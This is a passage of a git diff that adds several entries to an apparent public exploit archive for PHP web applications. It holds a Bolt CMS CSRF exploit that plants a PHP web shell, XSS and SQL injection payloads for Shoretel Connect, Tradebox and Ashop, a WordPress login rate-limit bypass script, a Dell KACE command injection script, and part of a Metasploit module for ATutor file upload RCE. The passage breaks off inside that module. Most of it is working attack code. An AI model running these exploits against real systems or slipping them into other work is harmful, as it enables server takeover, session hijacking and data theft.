A++++blockquote%3A+false++++++++%23+Allows+the+user+to+insert+blockquotes+using+the+%60%3Cblockquote%3E%60-tag.%0D%0A++++codesnippet%3A+false+++++++%23+Allows+the+user+to+insert+code+snippets+using+%60%3Cpre%3E%3Ccode%3E%60-tags.%0D%0A++++specialchar%3A+false+++++++%23+Adds+a+button+to+insert+special+chars+like+\\\'%E2%82%AC\\\'+or+\\\'%E2%84%A2\\\'.%0D%0A++++clipboard%3A+false+++++++++%23+Adds+buttons+to+\\\'undo\\\'+and+\\\'redo\\\'.%0D%0A++++copypaste%3A+false+++++++++%23+Adds+buttons+to+\\\'cut\\\'%2C+\\\'copy\\\'+and+\\\'paste\\\'.%0D%0A++++ck%3A%0D%0A++++++++autoParagraph%3A+true++%23+If+set+to+\\\'true\\\'%2C+any+pasted+content+is+wrapped+in+%60%3Cp%3E%60-tags+for+multiple+line-breaks%0D%0A++++++++disableNativeSpellChecker%3A+true+%23+If+set+to+\\\'true\\\'+it+will+stop+browsers+from+underlining+spelling+mistakes%0D%0A++++++++allowNbsp%3A+false+++++%23+If+set+to+\\\'false\\\'%2C+the+editor+will+strip+out+%60%26nbsp%3B%60+characters.+If+set+to+\\\'true\\\'%2C+it+will+allow+them.+%C2%AF%5C_(%E3%83%84)_%2F%C2%AF%0D%0A%0D%0A%23+Bolt+uses+the+Google+maps+API+for+it\\\'s+geolocation+field+and+Google+now%0D%0A%23+requires+that+it+be+loaded+with+an+API+key+on+new+domains.+You+can+generate%0D%0A%23+a+key+at+https%3A%2F%2Fdevelopers.google.com%2Fmaps%2Fdocumentation%2Fjavascript%2Fget-api-key%0D%0A%23+and+enter+it+here+to+make+sure+that+the+geolocation+field+works.%0D%0A%23+google_api_key%3A%0D%0A%0D%0A%23+Global+option+to+enable%2Fdisable+the+live+editor%0D%0Aliveeditor%3A+false%0D%0A%0D%0A%23+Use+the+\\\'mailoptions\\\'+setting+to+configure+how+Bolt+sends+email%3A+using+\\\'smtp\\\'%0D%0A%23+or+PHP\\\'s+built-in+%60mail()%60-function.%0D%0A%0D%0A%23+Note+that+the+latter+might+_seem_+easier%2C+but+it\\\'s+been+disabled+by+a+lot+of%0D%0A%23+webhosts%2C+in+order+to+prevent+spam+from+wrongly+configured+scripts.+If+you+use%0D%0A%23+it%2C+your+mail+might+disappear+into+a+black+hole%2C+without+producing+any+errors.%0D%0A%23+Generally+speaking%2C+using+\\\'smtp\\\'+is+the+better+option%2C+so+use+that+if+possible.%0D%0A%23%0D%0A%23+Protip%3A+If+your+webhost+does+not+support+SMTP%2C+sign+up+for+a+(free)+Sparkpost%0D%0A%23+account+at+https%3A%2F%2Fwww.sparkpost.com%2Fpricing%2F+for+sending+emails+reliably.%0D%0A%23%0D%0A%23+The+mail+defaults+use+bolt%40yourhostname+with+the+site+title+as+a+default.%0D%0A%23+Override+this+with+the+senderName+and+senderMail+fields%0D%0A%0D%0A%23+mailoptions%3A%0D%0A%23+++++transport%3A+smtp%0D%0A%23+++++spool%3A+true%0D%0A%23+++++host%3A+localhost%0D%0A%23+++++port%3A+25%0D%0A%23+++++username%3A+username%0D%0A%23+++++password%3A+password%0D%0A%23+++++encryption%3A+null%0D%0A%23+++++auth_mode%3A+null%0D%0A%23+++++senderMail%3A+null%0D%0A%23+++++senderName%3A+null%0D%0A%0D%0A%23+mailoptions%3A%0D%0A%23+++++transport%3A+mail%0D%0A%23+++++spool%3A+false%0D%0A%0D%0A%23+Bolt+allows+some+modifications+to+how+\\\'strict\\\'+login+sessions+are.+For+every%0D%0A%23+option+that+is+set+to+true%2C+it+becomes+harder+for+a+bad-willing+person+to%0D%0A%23+spoof+your+login+session.+However%2C+it+also+requires+you+to+re-authenticate%0D%0A%23+more+often+if+you+change+location(ip-address)+or+your+browser+has+frequent%0D%0A%23+upgrades.+Only+change+these+if+you+know+what+you\\\'re+doing%2C+and+you\\\'re+having%0D%0A%23+issues+with+the+default+settings.%0D%0A%23%0D%0A%23+Note%3A+If+you+change+any+of+these%2C+all+current+users+will+automatically+be%0D%0A%23+++++++logged+off.%0D%0Acookies_use_remoteaddr%3A+true%0D%0Acookies_use_browseragent%3A+false%0D%0Acookies_use_httphost%3A+true%0D%0A%0D%0A%23+The+length+of+time+a+user+stays+\\\'logged+in\\\'.+Change+to+0+to+end+the+session%0D%0A%23+when+the+browser+is+closed.%0D%0A%23%0D%0A%23+The+default+is+1209600+(two+weeks%2C+in+seconds).%0D%0Acookies_lifetime%3A+1209600%0D%0A%0D%0A%23+Set+the+session+cookie+to+a+specific+domain.+Leave+blank%2C+unless+you+know+what%0D%0A%23+you\\\'re+doing.%0D%0A%23%0D%0A%23+When+set+incorrectly%2C+you+might+not+be+able+to+log+on+at+all.%0D%0A%23%0D%0A%23+If+you\\\'d+like+it+to+be+valid+for+all+subdomains+of+\\\'www.example.org\\\'%2C+set+this%0D%0A%23+to+\\\'.example.org\\\'.%0D%0Acookies_domain%3A%0D%0A%0D%0A%23+The+hash_strength+determines+the+amount+of+iterations+for+encrypting%0D%0A%23+passwords.%0D%0A%23%0D%0A%23+A+higher+number+means+a+harder+to+decrypt+password%2C+but+takes+longer+to%0D%0A%23+compute.+\\\'8\\\'+is+the+minimum%2C+\\\'10\\\'+is+the+default%2C+\\\'12\\\'+is+better.%0D%0Ahash_strength%3A+10%0D%0A%0D%0A%23+Bolt+sets+the+%60X-Frame-Options%60+and+%60Frame-Options%60+to+%60SAMEORIGIN%60+by%0D%0A%23+default%2C+to+prevent+the+web+browser+from+rendering+an+iframe+if+origin%0D%0A%23+mismatch+(i.e.+iframe+source+refers+to+a+different+domain).%0D%0A%23%0D%0A%23+Setting+this+to+\\\'false\\\'%2C+will+prevent+the+setting+of+these+headers.%0D%0A%23+headers%3A%0D%0A%23+++++x_frame_options%3A+true%0D%0A%0D%0A%23+Bolt+uses+market.bolt.cm+to+fetch+it\\\'s+extensions+by+default.+You+can%0D%0A%23+change+that+URL+here.%0D%0A%23%0D%0A%23+Do+not+change+this%2C+unless+you+know+what+you\\\'re+doing%2C+and+understand+the%0D%0A%23+associated+risks.+If+you+use+\\\'http%3A%2F%2Fmarket.bolt.cm\\\'%2C+Bolt+will+not+use%0D%0A%23+SSL%2C+increasing+the+risk+for+a+MITM+attacks.%0D%0A%23+extensions%3A%0D%0A%23+++++site%3A+\\\'https%3A%2F%2Fmarket.bolt.cm%2F\\\'%0D%0A%23+++++enabled%3A+true%0D%0A%23+++++composer%3A%0D%0A%23+++++++++minimum-stability%3A+stable++++++%23+Either+\\\'stable\\\'%2C+\\\'beta\\\'%2C+or+\\\'dev\\\'.+Setting+\\\'dev\\\'+will+allow+you+to+install+dev-master+versions+of+extensions.%0D%0A%23+++++++++prefer-stable%3A+true++++++++++++%23+Prefer+stable+releases+over+development+ones%0D%0A%23+++++++++prefer-dist%3A+true++++++++++++++%23+Forces+installation+from+package+dist+even+for+dev+versions.%0D%0A%23+++++++++prefer-source%3A+false+++++++++++%23+Forces+installation+from+package+sources+when+possible%2C+including+VCS+information.%0D%0A%23+++++++++config%3A%0D%0A%23+++++++++++++optimize-autoloader%3A+false+++++%23+Optimize+autoloader+during+autoloader+dump.%0D%0A%23+++++++++++++classmap-authoritative%3A+false++%23+Autoload+classes+from+the+classmap+only.+Implicitly+enables+%60optimize-autoloader%60.%0D%0A%0D%0A%23+Enforcing+the+use+of+SSL.+If+set%2C+all+pages+will+enforce+an+SSL+connection%2C%0D%0A%23+and+redirect+to+HTTPS+if+you+attempt+to+visit+plain+HTTP+pages.%0D%0A%23+enforce_ssl%3A+true%0D%0A%0D%0A%23+If+configured%2C+Bolt+will+trust+X-Forwarded-XXX+headers+from+the+listed+IP%0D%0A%23+addresses+and+ranges+when+determining+whether+the+current+request+is%0D%0A%23+\\\'secure\\\'.%0D%0A%23%0D%0A%23+This+is+required+to+correctly+determine+the+current+hostname+and+protocol%0D%0A%23+(HTTP+vs.+HTTPS)+when+running+behind+some+proxy%2C+e.g.+a+load+balancer%2C+cache%2C%0D%0A%23+or+SSL+proxy.%0D%0A%23%0D%0A%23+List+the+IP+addresses+or+subnets+that+you+know+are+such+proxies.%0D%0A%23%0D%0A%23+Note%3A+Allowing+hosts+here+that+may+not+be+trusted+proxies+is+a+security+risk.%0D%0A%23+++++++If+you+do+not+understand+what+this+does%2C+it+is+probably+best+to+not%0D%0A%23+++++++touch+it.%0D%0A%23+trustProxies%3A%0D%0A%23+++++-+127.0.0.1%0D%0A%23+++++-+10.0.0.0%2F8%0D%0A%0D%0A%23+If+you+want+Bolt+installation+get+news+through+a+proxy%0D%0A%23+httpProxy%3A%0D%0A%23+++++host%3A+scheme%3A%2F%2Fmy.proxy.server%3Aport%0D%0A%23+++++user%3A+%5Busr%5D%0D%0A%23+++++password%3A+%5Bpwd%5D%0D%0A%0D%0A%23+Options+for+backend+user+interface%0D%0A%23+backend%3A%0D%0A%23++++news%3A%0D%0A%23++++++++disable%3A+true+++++%23+Disable+news+panel.+Defaults+to+false.+%22Alerts%22+will+still+be+shown.%0D%0A%23++++stack%3A%0D%0A%23++++++++disable%3A+true+++++%23+Disable+stack+usage.+Defaults+to+false.%0D%0A%0D%0A%23+Options+that+will+be+forced+in+next+major+version%0D%0Acompatibility%3A%0D%0A++++%23+Whether+to+return+TemplateView+instead+of+TemplateResponse+from+Controller%5CBase%3A%3Arender()%0D%0A++++%23+Response+methods+cannot+be+used+on+TemplateView+objects.%0D%0A++++%23+Setting+this+value+to+false+is+deprecated.%0D%0A++++template_view%3A+true%0D%0A++++%23+Set+to+\\\'false\\\'+to+enable+using+a+newer+version+of+the+setcontent+parser.%0D%0A++++setcontent_legacy%3A+true%0D%0A&file_edit%5Bsave%5D=undefined\\n\";\r\n" + 
+          "            var aBody = new Uint8Array(body.length);\r\n" + 
+          "            for (var i = 0; i \x3c aBody.length; i++)\r\n" + 
+          "              aBody[i] = body.charCodeAt(i); \r\n" + 
+          "            xhr.send(new Blob([aBody]));\r\n" + 
+          "        }\r\n" + 
+          "\r\n" + 
+          "        function UploadShell() {\r\n" + 
+          "            var xhr = new XMLHttpRequest();\r\n" + 
+          "            xhr.open(\"POST\", bolt_admin_url + \"/upload\", true);\r\n" + 
+          "            xhr.setRequestHeader(\"Accept\", \"application\\/json, text\\/javascript, *\\/*; q=0.01\");\r\n" + 
+          "            xhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\");\r\n" + 
+          "            xhr.setRequestHeader(\"Content-Type\", \"multipart\\/form-data; boundary=---------------------------130713229751679908527494159\");\r\n" + 
+          "            xhr.withCredentials = true;\r\n" + 
+          "            var body = \"-----------------------------130713229751679908527494159\\r\\n\" + \r\n" + 
+          "              \"Content-Disposition: form-data; name=\\\"files[]\\\"; filename=\\\"shell.php\\\"\\r\\n\" + \r\n" + 
+          "              \"Content-Type: text/plain\\r\\n\" + \r\n" + 
+          "              \"\\r\\n\" + \r\n" + 
+          "              \"\\x3c?php echo(system($_GET[\\\'cmd\\\'])); ?\\x3e\\n\" + \r\n" + 
+          "              \"\\r\\n\" + \r\n" + 
+          "              \"-----------------------------130713229751679908527494159--\\r\\n\";\r\n" + 
+          "            var aBody = new Uint8Array(body.length);\r\n" + 
+          "            for (var i = 0; i \x3c aBody.length; i++)\r\n" + 
+          "              aBody[i] = body.charCodeAt(i); \r\n" + 
+          "            xhr.send(new Blob([aBody]));\r\n" + 
+          "        }\r\n" + 
+          "    }\r\n" + 
+          "\r\n" + 
+          "    exploit();\r\n" + 
+          "\r\n" + 
+          "\x3c/script\x3e\r\n" + 
+          "\n" + 
+          "\r\n" + 
+          "-----------------------------130713229751679908527494159--\r\n";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i); 
+        xhr.send(new Blob([aBody]));
+
+        setTimeout(function() {
+            var dateObj = new Date();
+            var folder = dateObj.getFullYear() + "-" + (String("00"+(dateObj.getMonth()+1)).slice(-2));
+            document.getElementById('stager').src = target + "/files/"+folder+"/stager.html";
+            console.log("Called stager! Wait a moment and access: " + target + "/files/" + folder + "/shell.php?cmd=whoami");
+         }, 2000);
+
+      }
+
+      window.onload = function() {
+        exploit();
+      };
+
+    </script>
+     <iframe id="stager" style="width:0;height:0;border:0;border:none" src=""></iframe>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/46666.txt b/exploits/php/webapps/46666.txt
new file mode 100644
index 000000000..2e2c52f37
--- /dev/null
+++ b/exploits/php/webapps/46666.txt
@@ -0,0 +1,63 @@
+# Exploit Title: Shoretel Connect Multiple Vulnerability
+# Google Dork: inurl:/signin.php?ret=
+# Date: 14/06/2017
+# Author: Ramikan
+# Vendor Homepage: https://www.shoretel.com/
+# Software Link: https://www.shoretel.com/resource-center/shoretel-connect-onsite-overview
+# Version: Tested on 18.62.2000.0, 19.45.5101.0, 19.47.9000.0, 19.48.8400.0 can be affected on other versions.
+# Tested on: Mozila Firefox 53.0.3 (32 bit) Browser
+# CVE :CVE-2019-9591, CVE-2019-9592, CVE-2019-9593
+# Category:Web Apps
+
+
+Vulnerability: Reflected XSS and Session Fixation
+Vendor Web site: http://support.shoretel.com
+Version tested:18.62.2000.0, Version 19.45.1602.0, 19.45.5101.0, 19.47.9000.0, 19.48.8400.0
+Google dork: inurl:/signin.php?ret=
+Solution: Update to 19.49.1500.0
+
+
+
+Vulnerability 1:Refelected XSS & Form Action Hijacking
+
+Affected URL:
+
+/signin.php?ret=http%3A%2F%2Fdomainname.com%2F%3Fpage%3DACCOUNT&&brand=4429769&brandUrl=https://domainname.com/site/l8o5g--><script>alert(1)</script>y0gpy&page=ACCOUNT
+
+Affected Parameter: brandUrl
+
+
+Vulnerability 2: Reflected XSS
+
+Affected URL:
+
+/index.php/" onmouseover%3dalert(document.cookie) style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b
+
+Affected Parameter: url
+Affected Version 19.45.1602.0
+
+
+Vulnerability 3: Reflected XSS
+
+/site/?page=jtqv8"><script>alert(1)</script>bi14e
+
+Affected Parameter: page
+Affected Version:18.82.2000.0
+
+GET /site/?page=jtqv8"><script>alert(1)</script>bi14e HTTP/1.1
+Host: hostnamem
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://bdrsconference.bdrs.com/signin.php
+Cookie: PHPSESSID=2229e3450f16fcfb2531e2b9d01b9fec; chkcookie=1508247199505
+Connection: close
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+
+Vulnerability 4: Session Hijacking
+
+By exploiting the above XSS vulnerability, the attacker can obtain the valid session cookies of a authenticated user and hijack the session.
+
+PHPSESSID, chkcookie both cookies are insecure.
\ No newline at end of file
diff --git a/exploits/php/webapps/46671.txt b/exploits/php/webapps/46671.txt
new file mode 100644
index 000000000..00a546b7a
--- /dev/null
+++ b/exploits/php/webapps/46671.txt
@@ -0,0 +1,41 @@
+ # Title: Tradebox - CryptoCurrency Buy Sell and Trading
+# Date: 04.04.2019
+# Exploit Author: Abdullah Çelebi
+# Vendor Homepage: https://www.bdtask.com
+# Software Link: tradebox.bdtask.com/demo-v5.3/
+# Version: 5.4
+# Category: Webapps
+# Tested on: WAMPP @Win
+# Software description:
+Tradebox – CryptoCurrency Buy Sell and Trading Software. Tradebox is for
+the cryptocurrency trading and selling.even you can request for buy and
+sell at a specific price. There have withdrawal and deposit option.
+
+# Vulnerabilities:
+# An attacker can access all data following an authorized user login using
+the parameter.
+
+
+# POC - SQLi :
+
+# Parameter: symbol (POST)
+# Request URL: http://localhost/backend/dashboard/home/monthly_deposit
+#    Type : boolean-based blind
+csrf_test_name=53d7718e6ed975d198e33cfcad7def47&symbol=USD' AND 8149=8149
+AND 'PuLt'='PuLt
+
+#    Type : time-based blind
+csrf_test_name=53d7718e6ed975d198e33cfcad7def47&symbol=USD' OR (SELECT *
+FROM (SELECT(SLEEP(5)))rBnp) AND 'wNyS'='wNyS
+
+#    Type : error-based
+csrf_test_name=53d7718e6ed975d198e33cfcad7def47&symbol=USD' AND (SELECT
+5276 FROM(SELECT COUNT(*),CONCAT(0x7162707671,(SELECT
+(ELT(5276=5276,1))),0x7171787171,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CnKo'='CnKo
+
+#    Type : generic union
+csrf_test_name=53d7718e6ed975d198e33cfcad7def47&symbol=USD' UNION ALL
+SELECT
+NULL,CONCAT(0x7162707671,0x75664d4466634a4d505554424d6d6a577957506a51534d734c6e7551516f436f71444e77796f4a63,0x7171787171)--
+Lzbq
\ No newline at end of file
diff --git a/exploits/php/webapps/46672.js b/exploits/php/webapps/46672.js
new file mode 100644
index 000000000..4b246a735
--- /dev/null
+++ b/exploits/php/webapps/46672.js
@@ -0,0 +1,99 @@
+#!/usr/bin/env node
+const request = require("request")
+
+/**
+ * Exploit Title: Limit Login Attempts Reloaded by WPChef rate limiter bypass
+ * Date: 2019-04-08
+ * Exploit Author: isdampe
+ * Software Link: https://wordpress.org/plugins/limit-login-attempts-reloaded
+ * Version: 2.7.4
+ * Tested on: WordPress 5.1.1
+ *
+ * Description
+ * -----------
+ *
+ *  The plugin's primary goal is to limit the rate at which an individual can attempt
+ *  to authenticate with WordPress. Plugin has support for HTTP headers 
+ *  X_FORWARDED_FOR and X_SUCURI_CLIENTIP to allow rate limiting for users
+ *  when web servers are behind a reverse proxy service.
+ *  However, REMOTE_ADDR is not verified as a whitelisted proxy address, thus
+ *  allowing an attacker to easily forge either the X_FORWARDED_FOR or 
+ *  X_SUCURI_CLIENTIP headers to completely bypass the rate limiting service.
+ *
+ *  PoC
+ *  ---
+ */
+class LoginRequest
+{
+	constructor(loginUri, numberOfRepititions) {
+		this._loginUri = loginUri
+		this._numberOfRepititions = numberOfRepititions
+		this._count = 0
+	}
+
+	async process() {
+		await this._sendRequest()
+		if (this._count++ < this._numberOfRepititions)
+			this.process()
+	}
+
+	async _sendRequest() {
+		return new Promise(async (resolve, reject) => {
+			console.log(`Sending request ${this._count}...`)
+
+			request.post({
+				url : this._loginUri,
+				form: {
+					"log": this._getRandomString(),
+					"pwd": this._getRandomString(),
+					"wp-submit": "Log+In",
+					"redirect_to": "/wp-admin/",
+					"testcookie": "1"
+				},
+				headers: {
+					"X_FORWARDED_FOR": this._getRandomIp()
+				}
+			}, (err, res, body) => {
+				if (err)
+					console.error(err)
+
+				if (body.indexOf("Too many failed") > -1) {
+					reject("Login was rejected, exploit failed.")
+					return
+				}
+
+				resolve()
+				console.log(`\tRequest ${this._count} was not blocked`)
+			})
+
+		})
+	}
+
+	_getRandomString() {
+		const map = "abcdefghijklmnopqrstuvwxyz0123456789"
+		const length = Math.floor(Math.random() * 15) + 1
+		let buffer = ""
+		for (let i=0; i<length; ++i)
+			buffer += Math.floor(Math.random() * map.length)
+
+		return buffer
+	}
+
+	_getRandomIp() {
+		const bits = []
+		for (let x=0; x<4; ++x)
+			bits.push(Math.floor(Math.random() * 254)) + 1
+		return bits.join(".")
+	}
+
+}
+
+if (process.argv.length < 4) {
+	console.log("Usage: ./bypass-ip-block.js [url] [number_of_repititions]")
+	console.log("\turl:                     The url pointing to wp-login.php, (e.g. http://localhost/wp-login.php)")
+	console.log("\tnumber_of_repititions:   The number of login attempts to create (e.g. 500)")
+	process.exit(1)
+}
+
+const session = new LoginRequest(process.argv[2], process.argv[3])
+session.process()
\ No newline at end of file
diff --git a/exploits/php/webapps/46681.txt b/exploits/php/webapps/46681.txt
new file mode 100644
index 000000000..ab0da1fae
--- /dev/null
+++ b/exploits/php/webapps/46681.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Ashop Shopping Cart Software - SQL Injection
+# Date: 08.04.2019
+# Exploit Author: Doğukan Karaciğer
+# Vendor Homepage: http://www.ashopsoftware.com
+# Software Link: https://sourceforge.net/projects/ashop/
+# Demo Site: http://demo.ashopsoftware.com/
+# Version: Lastest
+# Tested on: Ubuntu-trusty-64
+# CVE: N/A
+
+----- PoC: SQLi -----
+
+Request: http://localhost/[PATH]/admin/bannedcustomers.php
+Parameter: blacklistitemid (POST)
+Type: AND/OR time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: blacklistitem=1&deletebutton=Delete&blacklistitemid=1 AND (SELECT
+* FROM (SELECT(SLEEP(5)))MGvE)
\ No newline at end of file
diff --git a/exploits/php/webapps/46684.py b/exploits/php/webapps/46684.py
new file mode 100755
index 000000000..541622aa2
--- /dev/null
+++ b/exploits/php/webapps/46684.py
@@ -0,0 +1,24 @@
+#!/usr/bin/python
+# Exploit Title: Dell KACE Systems Management Appliance (K1000) <= 6.4.120756 Unauthenticated RCE
+# Version:       <= 6.4.120756
+# Date:          2019-04-09
+# Author:        Julien Ahrens (@MrTuxracer)
+# Software Link: https://www.quest.com/products/kace-systems-management-appliance/
+# Write-up:      https://www.rcesecurity.com/2019/04/dell-kace-k1000-remote-code-execution-the-story-of-bug-k1-18652/
+# Note:          The software is maintained by Quest now, but the vulnerability was fixed while Quest was part of Dell.            
+#
+# Usage: python3 exploit.py https://localhost 'sleep 10'
+
+import requests
+import sys
+import urllib3
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+target_url = sys.argv[1]
+payload = sys.argv[2]
+
+r = requests.post(target_url + '/service/krashrpt.php', data={
+    'kuid' : '`' + payload + '`'
+    }, verify=False)
+
+print('Response: %s %s\nKACE Version: %s\nResponse time: %ss' % (r.status_code, r.reason, r.headers['X-DellKACE-Version'], r.elapsed.total_seconds()))
\ No newline at end of file
diff --git a/exploits/php/webapps/46691.rb b/exploits/php/webapps/46691.rb
new file mode 100755
index 000000000..fdad93c61
--- /dev/null
+++ b/exploits/php/webapps/46691.rb
@@ -0,0 +1,287 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "ATutor < 2.2.4 'file_manager' Remote Code Execution",
+      'Description'    => %q{
+         This module allows the user to run commands on the server with teacher user privilege.
+         The 'Upload files' section in the 'File Manager' field contains arbitrary file upload vulnerability.
+         The "$IllegalExtensions" function has control weakness and shortcomings.
+         It is possible to see illegal extensions within "constants.inc.php". (exe|asp|php|php3|php5|cgi|bat...)
+         However, there is no case-sensitive control. Therefore, it is possible to bypass control with filenames such as ".phP", ".Php"
+         It can also be used in dangerous extensions such as "shtml" and "phtml". 
+         The directory path for the "content" folder is located at "config.inc.php".
+         For the exploit to work, the "define ('AT_CONTENT_DIR', 'address')" content folder must be located in the web home directory or the address must be known.
+
+         This exploit creates a course with the teacher user and loads the malicious php file into server.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & MSF Module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', ''  ],
+          [ 'URL', 'http://pentest.com.tr/exploits/ATutor-2-2-4-file-manager-Remote-Code-Execution-Injection-Metasploit.html' ],
+          [ 'URL', 'https://atutor.github.io/' ],
+          [ 'URL', 'http://www.atutor.ca/' ]
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+        },
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [[ 'Automatic', { }]],
+      'DisclosureDate' => '09 April 2019',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']),
+        OptString.new('USERNAME', [true, 'The Teacher Username to authenticate as']),
+        OptString.new('PASSWORD', [true, 'The Teacher password to authenticate with']),
+        OptString.new('CONTENT_DIR', [true, 'The content folder location', 'content'])
+      ],self.class)
+  end
+
+  def exec_payload
+
+    send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "#{datastore['CONTENT_DIR']}", @course_id, "#{@fn}")
+    })
+  end
+
+  def peer
+    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
+  end
+
+  def print_status(msg='')
+    super("#{peer} - #{msg}")
+  end
+
+  def print_error(msg='')
+    super("#{peer} - #{msg}")
+  end
+
+  def print_good(msg='')
+    super("#{peer} - #{msg}")
+  end
+##
+# Version and Vulnerability Check
+##
+  def check
+
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "#{datastore['CONTENT_DIR']}/")
+    })
+
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    if res.code == 404
+       return Exploit::CheckCode::Safe
+    end
+    return Exploit::CheckCode::Appears
+  end
+##
+# csrftoken read and create a new course
+##
+  def create_course(cookie, check)
+
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri' => normalize_uri(target_uri.path, "mods", "_core", "courses", "users", "create_course.php"),
+      'headers' =>
+      {
+        'Referer' => "#{peer}#{datastore['TARGETURI']}users/index.php",
+        'cookie'   => cookie,
+      },
+      'agent' => 'Mozilla'
+    })
+
+    if res && res.code == 200 && res.body =~ /Create Course: My Start Pag/
+      @token = res.body.split('csrftoken"  value="')[1].split('"')[0]
+    else
+      return false
+    end 
+
+    @course_name = Rex::Text.rand_text_alpha_lower(5)
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(@token, nil, nil,'form-data; name="csrftoken"')
+    post_data.add_part('true', nil, nil, 'form-data; name="form_course"')
+    post_data.add_part(@course_name, nil, nil, 'form-data; name="title"')
+    post_data.add_part('top', nil, nil, 'form-data; name="content_packaging"')
+    post_data.add_part('protected', nil, nil, 'form-data; name="access"')
+    post_data.add_part('Save', nil, nil, 'form-data; name="submit"')
+    data = post_data.to_s
+
+    res = send_request_cgi({
+      'method' => 'POST',    
+      'data'  => data,
+      'agent' => 'Mozilla',
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'cookie' => cookie,
+      'uri' => normalize_uri(target_uri.path, "mods", "_core", "courses", "users", "create_course.php")     
+    })
+
+    location = res.redirection.to_s
+    if res && res.code == 302 && location.include?('bounce.php?course')
+      @course_id = location.split('course=')[1].split("&p")[0]
+      return true
+    else
+      return false
+    end
+  end
+##
+# Upload malicious file // payload integration
+##
+  def upload_shell(cookie, check)
+
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri' => normalize_uri(target_uri.path, "bounce.php?course=" + @course_id),
+      'headers' =>
+      {
+        'Referer' => "#{peer}#{datastore['TARGETURI']}users/index.php",
+        'cookie'   => cookie,
+      },
+      'agent' => 'Mozilla'
+    })
+
+    ucookie = "ATutorID=#{$2};" if res.get_cookies =~ /ATutorID=(.*); ATutorID=(.*);/
+
+    file_name = Rex::Text.rand_text_alpha_lower(8) + ".phP"
+    @fn = "#{file_name}"
+    post_data = Rex::MIME::Message.new
+    post_data.add_part('10485760', nil, nil, 'form-data; name="MAX_FILE_SIZE"')
+    post_data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"uploadedfile\"; filename=\"#{file_name}\"")
+    post_data.add_part('Upload', nil, nil, 'form-data; name="submit"')
+    post_data.add_part('', nil, nil, 'form-data; name="pathext"')
+
+    data = post_data.to_s
+
+    res = send_request_cgi({
+      'method' => 'POST',    
+      'data'  => data,
+      'agent' => 'Mozilla',
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'cookie' => ucookie,
+      'uri' => normalize_uri(target_uri.path, "mods", "_core", "file_manager", "upload.php")     
+    })
+
+    if res && res.code == 302 && res.redirection.to_s.include?('index.php?pathext')
+      print_status("Trying to upload #{file_name}")
+      return true
+    else
+      print_status("Error occurred during uploading!")
+      return false
+    end
+  end
+##
+# Password encryption with csrftoken
+##
+  def get_hashed_password(token, password, check)
+    if check
+      return Rex::Text.sha1(password + token)
+    else
+      return Rex::Text.sha1(Rex::Text.sha1(password) + token)
+    end
+  end
+##
+# User login operations
+##
+  def login(username, password, check)
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "login.php"),
+      'agent' => 'Mozilla',
+    })
+
+    token = $1 if res.body =~ /\) \+ \"(.*)\"\);/
+    cookie = "ATutorID=#{$1};" if res.get_cookies =~ /; ATutorID=(.*); ATutorID=/
+    if check
+      password = get_hashed_password(token, password, true)
+    else
+      password = get_hashed_password(token, password, false)
+    end
+
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, "login.php"),
+      'vars_post' => {
+        'form_password_hidden' => password,
+        'form_login' => username,
+        'submit' => 'Login'
+      },
+      'cookie' => cookie,
+      'agent' => 'Mozilla'
+    })
+    cookie = "ATutorID=#{$2};" if res.get_cookies =~ /(.*); ATutorID=(.*);/
+
+    if res && res.code == 302
+       if res.redirection.to_s.include?('bounce.php?course=0')
+        res = send_request_cgi({
+          'method'   => 'GET',
+          'uri'      => normalize_uri(target_uri.path, res.redirection),
+          'cookie' => cookie,
+          'agent' => 'Mozilla'
+        })
+        cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/
+        if res && res.code == 302 && res.redirection.to_s.include?('users/index.php')
+           res = send_request_cgi({
+             'method'   => 'GET',
+             'uri'      => normalize_uri(target_uri.path, res.redirection),
+             'cookie' => cookie,
+             'agent' => 'Mozilla'
+           })
